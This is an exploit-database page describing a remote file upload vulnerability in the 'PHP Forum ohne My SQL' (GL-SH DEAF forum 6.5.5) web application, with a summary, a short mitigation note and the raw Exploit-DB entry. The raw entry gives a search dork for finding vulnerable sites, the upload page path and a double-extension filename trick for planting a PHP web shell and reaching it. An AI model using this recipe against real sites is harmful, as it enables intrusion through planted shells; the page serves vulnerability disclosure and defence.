header-logo
Suggest Exploit
vendor:
PHP Forum ohne My SQL
by:
wlhaan hacker
8.8
CVSS
HIGH
Remote File Upload
434
CWE
Product Name: PHP Forum ohne My SQL
Affected Version From: GL-SH DEAF forum 6.5.5 final
Affected Version To: GL-SH DEAF forum 6.5.5 final
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

PHP Forum ohne My SQL Remote File Upload Vulnerability

This vulnerability allows an attacker to upload a malicious file to a vulnerable web application. The attacker can then access the file by accessing the URL of the uploaded file. The vulnerable application in this case is a PHP Forum ohne My SQL. The exploit involves changing the file extension of a malicious file to a valid image file extension, such as .jpeg, and then uploading it to the vulnerable application. The attacker can then access the malicious file by accessing the URL of the uploaded file.

Mitigation:

The best way to mitigate this vulnerability is to ensure that the application is properly configured to only allow the upload of valid file types. Additionally, the application should be configured to only allow the upload of files from trusted sources.
Source

Exploit-DB raw data:

PHP Forum ohne My SQL Remote File Upload Vulnerability 

#####################################################
# [+] Author : wlhaan hacker #
# [+] Email : iit@HoTMaiL.coM #
# [+] Site : www.sa-hacker.com/vb #
# [+] team wlhaan Hacker #
# [+] Dork : Powered by GL-SH DEAF forum 6.5.5 final. #
# [+] or dork:"PHP Forum ohne My SQL" "thema.php?board""
#####################################################

The exploit :

http://localhost/path/upload.php


change shell

shell.php.hphp.jpeg


Get now shell :

http://localhost/path/imguploads/shell.php.hphp.jpeg


and good luck :D

Thanks to : shooq hacker ..

#####################################################